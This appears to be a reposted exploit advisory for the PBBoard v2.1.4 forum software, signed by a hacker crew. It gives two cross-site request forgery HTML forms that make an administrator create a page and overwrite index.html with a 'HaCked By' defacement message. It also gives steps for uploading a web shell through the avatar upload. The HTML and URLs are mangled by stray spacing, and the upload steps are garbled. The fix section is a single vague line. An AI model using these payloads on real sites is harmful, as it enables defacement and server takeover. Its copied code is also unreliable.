Title: PBBoard v2.1.4 <= Multiple Vulnerabilites
KedAns-Dz www.2cto.com ked-h@hotmail.com | ked-h@exploit-id.com | kedans@facebook.com
Facebook: http://facebook.com/KedAns
Script: php
Defect category: Multiple XSRF/FU
Test Platform: Windows XP-SP3 Fr
###
##
# |> -------- ++ = [Dz Offenders Cr3w] ==++ -------- <|
# |> Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha & miX * Ev! LsCr! PT_Dz * Dr.55h |
# | KinG Of PiraTeS * The specified bl! N * soucha * dr. R! DE... |
# | ------------------------------------------------- <|
##
# [1] XSRF/CSRF Add NeW File =>
<Form action = "http: // [www.2cto.com]/admin. php? Page = pages & add = 1 & start = 1 "name =" myform "method =" post ">
<Input type = "text" name = "name" id = "input_name" value = "dz.html" size = "30"/> & nbsp;
<Textarea name = "text" id = "textarea_text" rows = "17" cols = "81" wrap = "virtual" dir = "/">
HaCked By KedAns-Dz
</Textarea>
<Input class = "submit" type = "submit" value = "Submit/Save" name = "submit" accesskey = "s"/>
</Form>
# [2] XSRF/CSRF Change Index File =>
<Form action = "http: // [www.2cto.com]/admin. php? Page = pages & dit = 1 & start = 1 & id = 1 "name =" myform "method =" post ">
<Input type = "text" name = "name" id = "input_name" value = "index.html" size = "30"/> & nbsp;
<Textarea name = "text" id = "textarea_text" rows = "17" cols = "81" wrap = "virtual" dir = "/">
HaCked By KedAns-Dz
</Textarea>
<Input class = "submit" type = "submit" value = "Submit/Accept" name = "submit" accesskey = "s"/>
</Form>
# [3] Shell/File Upload:
Go to after registration:
/Index. php? Page = usercp & control = 1 & avatar = 1 & main = 1
# Upload SHell {Ev! Lw..txt
+ Fin him/download/avatar/{Ev! Lw..txt
Fix:
Filter and verify the above Code Analysis